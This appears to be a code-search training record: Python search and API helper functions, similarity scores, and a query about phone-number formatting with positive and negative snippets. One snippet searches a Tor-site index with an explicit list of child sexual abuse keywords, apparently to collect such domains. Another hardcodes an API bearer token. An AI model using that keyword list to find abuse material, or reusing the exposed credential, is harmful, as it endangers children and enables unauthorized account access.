"def _search(self,\n limit=None,\n offset=None,\n format=None):\n if not limit:\n limit = constants.LIMIT\n if not format:\n format = constants.RETURN_FORMAT\n if not offset:\n offset = constants.OFFSET\n url = self.QUERY_URL.format(\n search_type='Image',\n query=urllib2.quote(\n \"'{}'\".format(self.query)),\n limit=limit,\n offset=offset,\n format=format)\n res = requests.get(url, auth=(\"\", self.api_key))\n try:\n json_results = res.json()\n except ValueError:\n raise PyBingImageException(\"Code:%s, Error: %s\" % (res.status_code,\n res.text))\n json_results = json_results.get('d', None)\n if json_results:\n json_results = json_results.get('results', None)\n packaged_results = [ImageResult(single_result_json)\n for single_result_json in json_results]\n self.offset += len(packaged_results)\n return packaged_results",
"def ask(self):\n self.term = str(input(\"What are you looking for? (Coffee, Restaurants, Museums, Bars) \"))\n if self.term.lower() == 'quit':\n sys.exit()\n self.destination = str(input(\"Where are you looking to go? (Neighborhood, City or City, State) \"))\n if self.destination.lower() == 'quit':\n sys.exit()\n \n \n #Request/JSON\n self.request = self.session.get(\"http://api.yelp.com/v2/search\", params={'term': self.term,'location': self.destination})\n self.request = self.request.json()\n \n #Dataframing\n self.menu = json_normalize(self.request['businesses'])\n self.menu.index = list(range(1, 21))\n self.menu = self.menu[['name', 'categories', 'location.address', 'location.city', 'location.coordinate.latitude', \\\n 'location.coordinate.longitude', 'review_count', 'rating', 'snippet_text']]\\\n .sort_values(['rating'], ascending=False).sort_index()",
"def search(api_key, term, location):\n\n\n\n url_params = {\n\n 'term': term.replace(' ', '+'),\n\n 'location': location.replace(' ', '+'),\n\n 'limit': SEARCH_LIMIT\n\n }\n\n return request(API_HOST, SEARCH_PATH, api_key, url_params=url_params)",
"def search_person_get(self, request):\n try:\n search_result = self.get_result_for_activitystream()\n for entry in search_result[\"result\"]:\n obj = entry.get(\"self\", None)\n if obj:\n # not provide object itself, but app specific data\n entry[\"self\"] = None\n entry[\"cs_activitystream_data\"] = _get_person_view(request, obj)\n entry[\"date\"] = dump_datetime(entry[\"date\"])\n return {\"result\": search_result}\n except ESException, e:\n misc.log_traceback(\"Enterprise Search: %s\" % e)\n res = request.ResponseClass(json.dumps(unicode(e)),\n status=HTTPInternalServerError.code,\n content_type=\"application/json\")\n return res",
"def get_data(inp):\n movies = __get_movies(inp)\n series = __get_series(inp)\n\n exist_title(movies, series)\n is_response_larger_than_max_results(movies, series)\n\n search_dict = {}\n\n if movies['Response'] != 'False':\n for movie in movies['Search']:\n search_dict.update({'movie': __get_title_info(movie['imdbID'])})\n\n if series['Response'] != 'False':\n for show in series['Search']:\n search_dict.update({'series': __get_title_info(show['imdbID'])})\n\n return search_dict",
"def results(self, **kwargs):\n\t\ttry:\n\t\t\tdata = self.json(**kwargs)\n\t\texcept TypeError:\n\t\t\traise exceptions.InvalidIcinga2ApiResponseError()\n\t\telse:\n\t\t\ttry:\n\t\t\t\treturn tuple(data[\"results\"])\n\t\t\texcept KeyError:\n\t\t\t\treturn tuple()",
"def _search(self,\n limit=None,\n offset=None,\n format=None):\n if not limit:\n limit = constants.LIMIT\n if not format:\n format = constants.RETURN_FORMAT\n if not offset:\n offset = constants.OFFSET\n url = self.QUERY_URL.format(\n search_type='Video',\n query=urllib2.quote(\n \"'{}'\".format(self.query)),\n limit=limit,\n offset=offset,\n format=format)\n res = requests.get(url, auth=(\"\", self.api_key))\n try:\n json_results = res.json()\n except ValueError:\n raise PyBingNewsException(\"Code:%s, Error: %s\" % (res.status_code,\n res.text))\n json_results = json_results.get('d', None)\n if json_results:\n json_results = json_results.get('results', None)\n packaged_results = [NewsResult(single_result_json)\n for single_result_json in json_results]\n self.offset += len(packaged_results)\n return packaged_results",
"def get_data():\n log = common.LogFile('', LOGFILE)\n settings = load_settings()\n keywords = settings[\"keywords\"]\n api_key = settings[\"api_key\"]\n for keyword in keywords:\n print(\"[{}] : fetching data.\".format(keyword))\n filename = \"results_{0}.json\".format(keyword)\n results = {}\n hits_limit = 500\n start_at = 1\n counter = 0\n while True:\n url = create_url(keyword, hits_limit, start_at, api_key)\n records = get_records_from_url(url)\n total_results = get_total_hits(records)\n records = split_records(records)\n records_on_page = len(records)\n if records_on_page == 0:\n break\n else:\n for record in records:\n counter += 1\n id_no = extract_id_number(record)\n processed_dict = {'ID': id_no, 'problem': []}\n processed_record = parse_record(\n record, processed_dict, log)\n if id_no not in results:\n results[id_no] = processed_record\n if counter % 100 == 0:\n print(\"Processed {} out of {}\".format(\n counter, total_results))\n start_at += hits_limit\n time.sleep(THROTTLE)\n print(\"[{}] : fetched {} records to {}.\".format(\n keyword, len(results), filename))\n save_data(results, filename)",
"def process_search_results_for_question(self, question=str, use_adv_search=bool):\n site = self.__site\n # execute the selected search\n if use_adv_search:\n # Note! This returns basically everything without any filtering\n # Therefore, ensure that the result has at least one answer\n search = site.search_advanced(q=question, answers=1)\n else:\n search = site.search(intitle=question, pagesize=self.__PAGE_SIZE)\n # was a result returned?\n if (search is None) or (len(search.items) == 0):\n return False\n\n # Note! If a large result set is returned, it may go through the first result page twice\n # I'm not sure why this happens, but it only happens for the first result page, and only\n # if the result set consists of more than one result page.\n\n for result_sets in search[:self.__PAGE_SIZE]:\n # retrieve the data\n accepted_answer_id = int(self.__is_key_in_json('accepted_answer_id', result_sets.json))\n answer_count = int(self.__is_key_in_json('answer_count', result_sets.json))\n creation_date = result_sets.creation_date\n is_answered = bool(self.__is_key_in_json('is_answered', result_sets.json))\n link = str(self.__is_key_in_json('link', result_sets.json))\n question_id = result_sets.id\n score = result_sets.score\n title = result_sets.title\n view_count = result_sets.view_count\n # check if this question has an owner/user\n if hasattr(result_sets, 'owner'):\n display_name = result_sets.owner.display_name\n profile_link = result_sets.owner.link\n reputation = result_sets.owner.reputation\n user_id = result_sets.owner.id\n user_type = result_sets.owner.user_type\n # create object of the User\n user_obj = StackExchangeUser(display_name, profile_link, reputation, user_id, user_type)\n else:\n user_obj = None\n # create object of the Question\n question_obj = StackExchangeQuestions(accepted_answer_id, answer_count, creation_date, is_answered, link,\n question_id, score, title, view_count, user_obj)\n self.__result_list.append(question_obj)\n return True",
"def search_adapter(json_response):\n\n def get_tracks():\n ret = {\"result\": []}\n for item in json_response['tracks']['items']:\n ret[\"result\"].append(json_to_track_info(item))\n return ret\n\n def get_albums():\n ret = {\"result\": []}\n for item in json_response['albums']['items']:\n album = item['name']\n artist = item['artists'][0]['name']\n album_id = item['uri']\n ret[\"result\"].append(\n {\"album\": album, \"artist\": artist, \"album_id\": album_id})\n return ret\n\n def get_artists():\n ret = {\"result\": []}\n for item in json_response['artists']['items']:\n artist = item['name']\n artist_id = item['uri']\n ret[\"result\"].append({\"artist\": artist, \"id\": artist_id})\n return ret\n\n if json_response.get('tracks', None):\n return get_tracks()\n\n if json_response.get('albums', None):\n return get_albums()\n\n if json_response.get('artists', None):\n return get_artists()\n\n return json_response",
"def main():\n #bearer_token = obtain_bearer_token(API_HOST, TOKEN_PATH)\n bearer_token ='SHdrjUqMJXqXBKUc7bGIplM8y6tnbwZbXXDbWPCd9wWMP8tX9PdJrC5MZHwJRhb7jMtLjXxT-hsWjNf2OkdiDWd30HsS84AVI5iRnrpxkak3HbWXAdUKvraQ_wgXWXYx'\n response = transaction_search(bearer_token, '1910 Entrepreneur Dr, Raleigh, NC 27518')\n response = response.get('businesses')\n print(json.dumps(response, indent=4))",
"def book_search_results(key, title):\n\n payload = {\"key\": key, \"q\": title}\n query = requests.get(\"https://www.goodreads.com/search.xml\", params=payload)\n\n doc = untangle.parse(query.content)\n\n results = doc.GoodreadsResponse.search.results\n\n books = []\n\n if len(results) > 0:\n for work in results.work:\n book = {}\n\n book['title'] = work.best_book.title.cdata\n book['book_id'] = int(work.best_book.id.cdata.encode('utf8'))\n book['author_id'] = int(work.best_book.author.id.cdata.encode('utf8'))\n book['author_fname'] = work.best_book.author.name.cdata\n book['image_url'] = work.best_book.image_url.cdata.encode('utf8')\n books.append(book)\n\n return books",
"def do_search(arg):\n result = {'count': 0, 'time': 0, 'records': []}\n try:\n uri, q, k, m = arg\n dqp = Pyro.core.getProxyForURI(uri)\n scoresLen,results,indocids,exdocids = dqp.search(q, k, m)\n result=(scoresLen,results,indocids,exdocids)\n except Exception as e:\n print \"Exception:\", e\n return result",
"def __update_page_results(self):\n \n pages = []\n\n # Request id for pages associated to search term \n page_fields='page&fields=id,name,username,link'\n term = self.track[self.track_index]\n self.track_index += 1\n \n # Define url for http request to get pages id associated to search term \n page_request_url = 'https://graph.facebook.com/search?q=%s&type=%s&limit=%d&access_token=%s'%(term,page_fields,self.page_lim,self.access_token)\n \n while(True):\n # Try 100 times\n for i in range(100):\n \n page_response = requests.get(page_request_url)\n \n if 'error' in page_response.json() or page_response.status_code <> 200:\n print \"\\n !---- ERROR IN SEARCH REQUEST ----!\"\n print time.ctime()\n print \"Status Code: \", page_response.status_code\n print page_response.json()\n #raise StopIteration()\n time.sleep(1800) # Wait 30 minutes\n else:\n break\n \n page_json = page_response.json()\n pages = pages + page_json['data']\n time.sleep(5)\n \n if 'next' in page_json['paging']:\n page_request_url = page_json['paging']['next']\n else:\n break\n \n print \"Term: %s, Pages: %d\"%(term, len(pages))\n return pages",
"def get_a_business_by_name(current_user):\n business_name = str(request.args.get('q'))\n filter_type = str(request.args.get('filter_type'))\n filter_value = str(request.args.get('filter_value'))\n\n results = Business.query.filter(\n Business.name.ilike('%' + business_name + '%'))\n\n # filter by either category or location\n if filter_type and filter_value:\n if filter_type == 'category':\n results = Business.query.filter(\n Business.category.ilike('%'+filter_value+'%')).filter(\n Business.name.ilike('%' + business_name + '%'))\n\n if filter_type == 'location':\n results = Business.query.filter(\n Business.location.ilike('%' + filter_value + '%')).filter(\n Business.name.ilike('%' + business_name + '%'))\n\n # paginate results\n page = request.args.get('page', 1, type=int)\n limit = request.args.get('limit', results.count(), type=int)\n\n pagination = results.paginate(page, per_page=limit, error_out=False)\n search_results = pagination.items\n prev = None\n\n if pagination.has_prev:\n prev = url_for(\n 'api.get_a_business_by_name', page=page - 1, _external=True)\n next = None\n\n if pagination.has_next:\n next = url_for(\n 'api.get_a_business_by_name', page=page + 1, _external=True)\n\n if not search_results:\n return make_json_reply(\n 'message', 'No businesses registered called ' + business_name), 404\n\n return make_json_reply(\n 'results', {\n 'searched_businesses':\n [business.to_json() for business in search_results],\n 'prev':\n prev,\n 'next':\n next,\n 'records': math.ceil(results.count() / 5)\n }), 200",
"def API_request(self, search_term, search_type):\n url = \"\"\n if search_type == \"product\":\n url = self.url_product.format(search_term)\n elif search_type == \"substitute\":\n url = self.url_substitute.format(search_term)\n r = requests.get(url)\n response = r.json()\n return response[\"products\"]",
"def get_search_results(text, out_file=None, num_res=3):\n # specify the source website\n text += ' site:tableau.com'\n text = urllib.parse.quote_plus(text)\n\n url = 'https://google.com/search?q=' + text\n USER_AGENT = {\n 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36'}\n \n # TODO: add delay here?\n response = requests.get(url,headers=USER_AGENT)\n\n soup = BeautifulSoup(response.text, 'html.parser')\n result_block = soup.find_all('div', attrs={'class': 'g'})\n\n final_result = []\n for rb_ind in range(len(result_block)):\n if len(final_result)==num_res:\n # done sraping\n break\n \n rb = result_block[rb_ind]\n # print(rb_ind)\n if rb.find('h3'):\n title = rb.find('h3').text\n link = rb.find('a', href=True)['href']\n\n desc = rb.find(class_='IsZvec').text\n \n if not desc:\n # print(rb_ind)\n # print(\"got here\")\n desc = rb.find(class_='ILfuVd')\n if desc:\n desc = desc.text\n else:\n desc = ''\n final_result.append([title,link,desc])\n print('\\n'.join([title,link,desc]))\n\n if out_file is not None:\n with open(out_file,\"a+\",encoding='utf8') as f:\n f.writelines([r + '\\n' for r in final_result])\n \n return final_result",
"def main():\n domain_list = []\n base_url = \"http://localhost:9200/latest-tor/_search?pretty&size=9000&_source=title,domain\"\n keywords_list = ['preteen', 'loli', 'lolita', 'jailbait', 'pthc', 'best cp',\n '\"child porn\"', '\"kid porn\"', '\"child sex\"', '\"cp video\"',\n '\"nude children\"', '\"cp porn\"', '\"free child porn\"', 'kinderporn',\n '\"child rape\"', '\"toddler porn\"', '\"kids videos\"', '\"cp videos\"',\n 'lolilust', '\"pedo porno\"', '\"pedo content\"', 'underage', '\"cp pack\"',\n 'loliporn', 'pedofamily', '\"cp database\"', '\"pedo webcams\"', 'lolitacity']\n '\"xxx child\"', '\"xxx underage\"', '\"young forbidden\"']\n search_terms = []\n for index, term in enumerate(keywords_list):\n search_terms.append(term)\n if len(search_terms) >= 10 or index + 1 == len(keywords_list):\n url = base_url + \"&q=(\" + \" OR \".join(search_terms).replace(\" \", \"%20\") + \")\"\n search(url, domain_list)\n search_terms = []",
"def _run_async_query(self, context):\n url = self._build_url(\"/_search\")\n request = self._build_request(0, -1)\n resp = self._cb.post_object(url, body=request)\n result = resp.json()\n self._total_results = result[\"num_found\"]\n self._count_valid = True\n results = result.get(\"results\", [])\n return [self._doc_class(self._cb, item[\"id\"], item) for item in results]",
"def _run_async_query(self, context):\n url = self._build_url(\"/_search\")\n request = self._build_request(0, -1)\n resp = self._cb.post_object(url, body=request)\n result = resp.json()\n self._total_results = result[\"num_found\"]\n self._count_valid = True\n results = result.get(\"results\", [])\n return [self._doc_class(self._cb, item[\"id\"], item) for item in results]",
"def get_results(job, limit):\n reader = results.ResultsReader(job.results(count=limit))\n return {\"results\": [row for row in reader]}",
"def search(request):\n\tif request.method == 'GET':\n\t\ttitle = request.GET.get('title')\n\t\tname = request.GET.get('person')\n\t\tif title:\n\t\t\treturn search_by_title(title)\n\t\telif name:\n\t\t\treturn search_by_person(name)\n\t\telse:\n\t\t\treturn JSONResponse({})",
"def get_result_by_name(self, name):\n found = None\n for result in self.results:\n if result.heading == name:\n found = result\n break\n return found",
"def get(self, query, count=None):\r\n params = base.get_params(('count',), locals())\r\n params['q'] = query\r\n request = http.Request('GET', self.get_url(), params)\r\n\r\n return request, parsers.parse_json",
"def searchByKeywordPro(self, query, since=\"\", until=\"\", maxResults=None):\n\n tweetsList = []\n if(not maxResults):\n tweetList, next_token = self.api.search_30_day(\n environment_name=\"developer\", query=query, toDate=until, fromDate=since)\n tweetsList.append(tweetList)\n while(next_token):\n tweetList, next_token = self.api.search_30_day(\n environment_name=\"developer\", query=query, toDate=until, fromDate=since, next=next_token)\n tweetsList.append(tweetList)\n else:\n tweetList, next_token = self.api.search_30_day(\n environment_name=\"developer\", query=query, toDate=until, fromDate=since)\n tweetsList.append(tweetList)\n maxResults -= len(tweetList)\n while(next_token and maxResults > 0):\n tweetList, next_token = self.api.search_30_day(\n environment_name=\"developer\", query=query, toDate=until, fromDate=since, next=next_token)\n tweetsList.append(tweetList)\n maxResults -= len(tweetList)\n for status in tweetsList:\n createdDate = parser.parse(str(status._json[\"created_at\"]).strip())\n createdDate = createdDate.replace(\n tzinfo=pytz.utc) - createdDate.utcoffset()\n status_refined = {\n 'keyword': query,\n '_id': status._json[\"id\"],\n 'created_at': createdDate,\n 'tweetText': status._json[\"text\"],\n 'hashtags': status._json[\"entities\"][\"hashtags\"],\n 'userLoc': status._json[\"user\"][\"location\"],\n 'tweetGeo': status._json[\"geo\"],\n 'tweetCoordinates': status._json[\"coordinates\"],\n 'tweetPlace': status._json[\"place\"],\n 'retweet': {},\n 'quote': {},\n }\n if hasattr(status, \"quoted_status\"):\n if \"extended_tweet\" in status._json[\"quoted_status\"].keys():\n print(\"Taking the expanded tweet\")\n status_refined['tweetText'] = status._json[\"quoted_status\"][\"extended_tweet\"][\"full_text\"]\n else:\n status_refined['tweetText'] = status._json[\"quoted_status\"][\"text\"]\n status_refined['quote'] = {\n 'original_retweet_id': status._json[\"quoted_status\"][\"id\"],\n 'origUserLoc': status._json[\"quoted_status\"][\"user\"][\"location\"],\n 'origTweetLoc': status._json[\"quoted_status\"][\"geo\"],\n 'origTweetPlace': status._json[\"quoted_status\"][\"place\"],\n 'origTweetCoord': status._json[\"quoted_status\"][\"coordinates\"],\n 'origHashtags': status._json[\"quoted_status\"][\"entities\"][\"hashtags\"],\n 'retweet_count': status._json[\"quote_count\"],\n }\n elif hasattr(status, \"retweeted_status\"):\n print(status._json[\"retweeted_status\"])\n if \"extended_tweet\" in status._json[\"retweeted_status\"].keys():\n print(\"Taking the expanded tweet\")\n status_refined['tweetText'] = status._json[\"retweeted_status\"][\"extended_tweet\"][\"full_text\"]\n else:\n status_refined['tweetText'] = status._json[\"retweeted_status\"][\"text\"]\n status_refined['retweet'] = {\n 'original_retweet_id': status._json[\"retweeted_status\"][\"id\"],\n 'origUserLoc': status._json[\"retweeted_status\"][\"user\"][\"location\"],\n 'origTweetLoc': status._json[\"retweeted_status\"][\"geo\"],\n 'origTweetPlace': status._json[\"retweeted_status\"][\"place\"],\n 'origTweetCoord': status._json[\"retweeted_status\"][\"coordinates\"],\n 'origHashtags': status._json[\"retweeted_status\"][\"entities\"][\"hashtags\"],\n 'retweet_count': status._json[\"retweet_count\"],\n }\n elif hasattr(status, \"extended_tweet\"):\n if \"extended_tweet\" in status._json.keys():\n status_refined['tweetText'] = status._json[\"extended_tweet\"][\"full_text\"]\n self.tweets.append(status_refined)\n return self.tweets",
"def get(self, request, format=None):\n user = request.user\n user.backend = 'django.contrib.auth.backends.ModelBackend'\n login(request, user)\n keywords = request.GET.get('tags', '')\n result = {\n 'keywords': [],\n 'trademark': 0\n }\n\n if keywords != '':\n for word in keywords.split(','):\n payload = {\n 'apikey': settings.KEYWORDTOOL,\n 'keyword': '[{0}]'.format(word),\n 'output': 'json',\n 'country': 'us',\n 'language': 'en',\n 'metrics': 'true',\n 'metrics_location': '2840',\n 'metrics_language': 'en'\n }\n word = word.lower()\n\n word_result = Word.objects.filter(name=word).first()\n\n if word_result:\n data = word_result.results\n else:\n data = False\n try:\n data_keywordtool = requests.get(\n 'http://api.keywordtool.io/v2/search/suggestions/amazon', params=payload)\n if data_keywordtool.status_code == 200:\n results = data_keywordtool.json()\n created_word = Word.objects.create(\n name=word, results=results)\n data = created_word.results\n except Exception as e:\n pass\n\n list_keywords = []\n if data:\n for item in data['results']:\n for sub_item in data['results'][item]:\n if 'volume' in sub_item and 'string' in sub_item:\n if sub_item['volume'] > 300 and not sub_item['string'] in list_keywords:\n list_keywords.append(sub_item['string'])\n result['keywords'].append({'name': sub_item['string'].replace(\n '[', '').replace(']', ''), 'volume': sub_item['volume'], 'trademark': False})\n\n return Response(result)",
"def get_search_results(results):\n if len(results) == 0:\n return []\n if type(results) == tuple and len(results) == 2:\n (code, arr) = results\n elif type(results) == list:\n arr = results\n\n res = []\n for item in arr:\n res.append(LDAPSearchResult(item))\n\n return res",
"def _search(q: str, n: int):\n return search_client.retrieve([q], n)[0]",
"def get(self):\n uri = urlparse(self.request.uri)\n query = ''\n results = []\n number_returned = 0\n if uri.query:\n query = parse_qs(uri.query)\n query = query['query'][0]\n\n # sort results by salesRankMediumTerm and bestSellingRank descending\n expr_list = [search.SortExpression(\n expression='salesRankMediumTerm', default_value='',\n direction=search.SortExpression.DESCENDING), search.SortExpression(\n expression='bestSellingRank', default_value='',\n direction=search.SortExpression.DESCENDING)]\n\n # construct the sort options\n sort_opts = search.SortOptions(\n expressions=expr_list)\n query_options = search.QueryOptions(\n limit=10,\n sort_options=sort_opts)\n query_obj = search.Query(query_string=query, options=query_options)\n results = search.Index(name=_INDEX_NAME).search(query=query_obj)\n number_returned = len(results.results)\n\n # use magic python incantations to extract and filter on returned doc IDs\n dsids = iterattr(results,'doc_id')\n # dammit, remember that you have to int() your keys\n dskeys = [ndb.Key(BestBuyProduct, int(k)) for k in dsids]\n dsresults = ndb.get_multi(dskeys)\n\n template_values = {\n 'results': results,\n 'dsresults': dsresults,\n 'number_returned': number_returned,\n 'query': query,\n }\n self.render_template('index.html', template_values)",
"def get_search_result(self, user_input):\n\n conn = sqlite3.connect(self.db_name)\n\n request_field = '%' + user_input[0].strip() + '%'\n request_city = '%' + user_input[1].strip() + '%'\n\n activity_ids = []\n activities_dictionary = {}\n activities_array = self.search_activity(conn, request_field)\n for data in activities_array:\n # We use an array of id to easily iterate and a dictionary to find the names correspondence later\n activity_ids.append(data[0])\n activities_dictionary[data[0]] = data[1]\n\n equipment_activity_ids = {}\n equipment_ids = []\n for data in self.get_equipments_by_activity(conn, activity_ids):\n equipment_ids.append(data[0])\n # If the reference doesn't exist we create it, if it does we add the activityId to it\n if data[0] in equipment_activity_ids:\n equipment_activity_ids.get(data[0]).append(data[1])\n else:\n equipment_activity_ids[data[0]] = [data[1]]\n\n equipments_array = self.get_equipments_by_ids(conn, equipment_ids)\n\n installation_ids = []\n for data in equipments_array:\n if data[2] not in installation_ids:\n installation_ids.append(data[2])\n\n installations_list = []\n # At first we get all installations matching our previously gathered ids and the city name\n for data_installation in self.search_installation(conn, request_city, installation_ids):\n current_installation = Installation(data_installation[0], data_installation[1], data_installation[2],\n data_installation[3], data_installation[4], data_installation[5],\n data_installation[6])\n for data_equipment in equipments_array:\n if data_equipment[2] == current_installation.id:\n current_equipment = Equipment(data_equipment[0], data_equipment[1], data_equipment[2])\n # Then, we add the matching equipments to the installation object\n for key in equipment_activity_ids.keys():\n if key == current_equipment.id:\n for value in equipment_activity_ids.get(key):\n # And the matching activities to the equipment object\n current_equipment.add_activity(Activity(value, activities_dictionary.get(value)))\n\n current_installation.add_equipment(current_equipment)\n equipments_array.remove(data_equipment)\n\n installations_list.append(current_installation)\n\n conn.close()\n\n return installations_list",
"def API_companysearch(request):\n company = request.GET.get(\"search\")\n company = str(company).strip()\n results = models.Company.objects.filter(name__icontains = company)\n results = [[company.pk,company.name] for company in results]\n return django.http.JsonResponse({\"success\":True,\"results\":results})"
] | [
"0.66276145",
"0.64622295",
"0.6457914",
"0.63681644",
"0.6349981",
"0.6308854",
"0.61306053",
"0.610485",
"0.6067382",
"0.6036991",
"0.6029927",
"0.6004755",
"0.599794",
"0.5988681",
"0.5967956",
"0.59640205",
"0.59510136",
"0.59347636",
"0.5904494",
"0.5894489",
"0.58941627",
"0.5854421",
"0.58452606",
"0.58301514",
"0.581294",
"0.57973486",
"0.57860017",
"0.5715516",
"0.5701925",
"0.56949675",
"0.56795156",
"0.56657547",
"0.5656504",
"0.56552166",
"0.56500673",
"0.5644365",
"0.56343067",
"0.5633818",
"0.5626904",
"0.5618177",
"0.5610227",
"0.55919987",
"0.55753034",
"0.5564365",
"0.5557539",
"0.5544373",
"0.5533774",
"0.55305463",
"0.5523531",
"0.55112916",
"0.54973274",
"0.54945004",
"0.5494356",
"0.5493225",
"0.5488082",
"0.5487667",
"0.54824775",
"0.5479659",
"0.5475852",
"0.54655015",
"0.5460016",
"0.5459708",
"0.5456413",
"0.5455547",
"0.5452221",
"0.5452221",
"0.545142",
"0.5448127",
"0.5445892",
"0.5438542",
"0.5437106",
"0.54350585",
"0.5427371",
"0.5425259",
"0.541577",
"0.54088676",
"0.54019636",
"0.54003316",
"0.5398073",
"0.53954643",
"0.5374319",
"0.5370074",
"0.5364909",
"0.53633755",
"0.53615546",
"0.5360936",
"0.5356412",
"0.5354532",
"0.5354532",
"0.5352124",
"0.53519523",
"0.53500193",
"0.5345639",
"0.53453356",
"0.53418666",
"0.53410006",
"0.5340845",
"0.5335779",
"0.53290105",
"0.5324427"
] | 0.6288888 | 6 |
phone numbers should be correctly formatted, and some searches were returning errors from missing numbers | def phone_number_organizer(self, key):
try:
phone_number = key[u'phone']
format_number = '(' + phone_number[0:3] + ') ' + phone_number[3:6] + '-' + phone_number[6:]
return format_number
except KeyError:
print key[u'name'], "requires manual phone number verification."
return "Manual Input" | {
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
} | [
"def audit_phone_numbers(formats, number):\n\n # check formatting\n if re.match(r'^\\+39', number): # starts with +39\n formats['has_country_code'] += 1\n else:\n formats['no_country_code'] += 1\n if re.match(r'^(?:\\+?39)?81', number):\n formats['missing_prefix'] += 1\n if re.search('-', number): # has a dash\n formats['has_dashes'] += 1\n if re.search(r'\\s', number): # contains any whitespace character\n formats['has_spaces'] += 1\n\n # Strip number to count digits\n digits_only = re.sub(r'[^\\d]', '', number)\n # remove country code to count remaining digits\n digits_only = re.sub(r'^39', '', digits_only)\n if not 6 <= len(digits_only) <= 11:\n formats['incorrect_length'].append(number)\n\n # catch all numbers with unexpected characters\n if re.search(r'[^\\+\\d\\s-]', number):\n formats['bad_chars'].append(number)",
"def test_format_phone_formatted(self):\n number1 = '809.555.1234'\n self.assertEqual(format_phone(number1), '(809) 555-1234')\n number2 = '(888) 555-3456'\n self.assertEqual(format_phone(number2), '(888) 555-3456')",
"def format_and_validate_phonenumber(number):\n \n if number.startswith('+'):\n number = number.replace('+', '00', 1)\n \n regex = re.compile('(\\/|\\+|-| )')\n number = regex.sub('', number)\n \n if number.startswith(COUNTRY_CODE_PHONE):\n number = number.replace(COUNTRY_CODE_PHONE, '0', 1)\n\n # if the conversion to int does not fail then\n # there are only numbers included in the string\n try:\n int(number)\n except ValueError:\n raise ValidationError(_('Please enter numbers only.'))\n \n if number.startswith(START_MOBILE_PHONE):\n return number\n else:\n raise ValidationError(_('Please enter a cell phone number.'))",
"def test_format_phone_raw(self):\n number = '8095551234'\n self.assertEqual(format_phone(number), '(809) 555-1234')",
"def test_formatted_number(self):\n node = self.create_xml_patient({'Mobile_Number': '(33)-0001112222'})\n payload = self.create_payload([node])\n parse_patient(node, payload)\n patient = payload.patients.all()[0]\n self.assertEqual(patient.contact.phone, '+330001112222')",
"def check_format_user_phone(phone):\n match = re.match(r'^\\+[0-9]{10,}$', phone)\n if not match:\n raise exceptions.ValidationError('phone is not valid!')\n return phone",
"def test_address__normalize_phone_number__3():\n assert '+491234567891' == normalize_phone_number('01234/5678-91', '+49')",
"def phone_valid(number):\n model = '[0-9]{2} [0-9]{5}-[0-9]{4}'\n\n return re.findall(model, number)",
"def test_address__normalize_phone_number__4():\n assert '+491234507090' == normalize_phone_number('01234/5070-90', '+49')",
"def test_address__normalize_phone_number__2():\n assert '+491234567890' == normalize_phone_number(\n '+49 (1234) 5678 - 90X', '+49')",
"def clean_phone(self):\n data = self.cleaned_data['phone']\n data = data.strip(' +').replace('-', '')\n if len(data) == 12:\n data = data[3:]\n\n return data",
"def test_00_phonenumbers_formatting_en_US(self):\n number_phone = self.samples[0]\n res = self.pn._symbol_set_char(number_phone)\n self.assertEqual(res, '+19545551234', 'e164 phone formatting failed')\n res = self.pn._symbol_get(number_phone)\n self.assertEqual(res, '+1 954-555-1234', 'International phone formatting failed')",
"def clean_phone(self):\n phone = self.cleaned_data['phone']\n if phone.startswith('8') and len(phone) > 7:\n return phone.replace('8', '+7', 1)\n\n return phone",
"def test_address__normalize_phone_number__7():\n assert '+421234007891' == normalize_phone_number(\n '0042-1234/0078-91', '+49')",
"def normalize(phone):\n d = re.sub('\\D', '', phone)\n return '+7 (%s) %s-%s-%s' % (d[1:4], d[4:7], d[7:9], d[9:11])",
"def test_address__normalize_phone_number__6():\n assert '+421234567891' == normalize_phone_number(\n '0042-1234/5678-91', '+49')",
"def validate_phone(form, field):\n if len(field.data) > 16:\n raise ValidationError('Invalid phone number')\n try:\n input_number = phonenumbers.parse(field.data)\n if not (phonenumbers.is_valid_number(input_number)):\n raise ValidationError('Invalid phone number')\n except Exception:\n input_number = phonenumbers.parse('+1' + field.data)\n if not (phonenumbers.is_valid_number(input_number)):\n raise ValidationError('Invalid phone number')",
"def test_30_phonenumbers_empty(self):\n number_phone = self.samples[3]\n res = self.pn._symbol_set_char(number_phone)\n self.assertEqual(res, None, 'e164 phone formatting failed')\n res = self.pn._symbol_get(number_phone)\n self.assertEqual(res, None, 'International phone formatting failed')",
"def clean_phone(number):\n numberlist = re.findall(\"\\d\",number)\n new_number = \"\".join(numberlist)\n if len(new_number) == 8:\n \tnew_number = \"010\" + new_number\n\tnew_number = new_number[-11:]\n\tif new_number.startswith('1'):\n\t\tnew_number = \"+86-\" + new_number\n\telse:\n\t\tnew_number = \"+86-10-\" + new_number[-8:]\n\treturn new_number",
"def phoneNumberExtractor(self,data):\n\t\tdata = data.replace(\"\\r\", \" \")\n\t\tdata = data.replace(\"\\r\\n\", \" \")\n\n\t\t#first is identifying 10 digits code\n\t\tdata = data.split()\n\t\tresult = []\n\t\tfor word in data:\n\t\t\tres = None\n\t\t\tres = word if word.isdecimal() and len(word) == 10 and not res else res\n\t\t\tres = word[2:] if word.isdecimal() and len(word) == 12 and not res else res\n\t\t\tres = word[3:] if word[3:].isdecimal() and len(word) == 10 and not res else res\n\t\t\tif (\"(\" and \")\") in word or \"-\" in word:\n\t\t\t\tword = word.replace(\"(\",\"\")\n\t\t\t\tword = word.replace(\")\",\"\")\n\t\t\t\tword = word.replace (\"-\",\"\")\n\t\t\t\tres = word if(len(word) == 10) else None\n\t\t\tif res:\n\t\t\t\tresult.append(res)\n\t\t\t\tdel(res)\n\t\treturn set(result)",
"def test_40_phonenumbers_too_long(self):\n number_phone = self.samples[4]\n with self.assertRaises(osv.except_osv):\n self.pn._symbol_set_char(number_phone)",
"def phone(raw_phone):\n\n phone = raw_phone.replace('+33', '0')\n phone = '{} {} {} {} {}'.format(\n phone[0:2],\n phone[2:4],\n phone[4:6],\n phone[6:8],\n phone[8:10])\n return phone",
"def parse_phone(phone):\n if isinstance(phone, int):\n return str(phone)\n else:\n phone = re.sub(r'[+()\\s-]', '', str(phone))\n if phone.isdigit():\n return phone",
"def test_address__normalize_phone_number__1():\n assert '+491234567890' == normalize_phone_number('+491234567890', '+49')",
"def test_valid_phone_valid():\n assert valid_phone(\"000-000-0000\")\n assert valid_phone(\"0000000000\")",
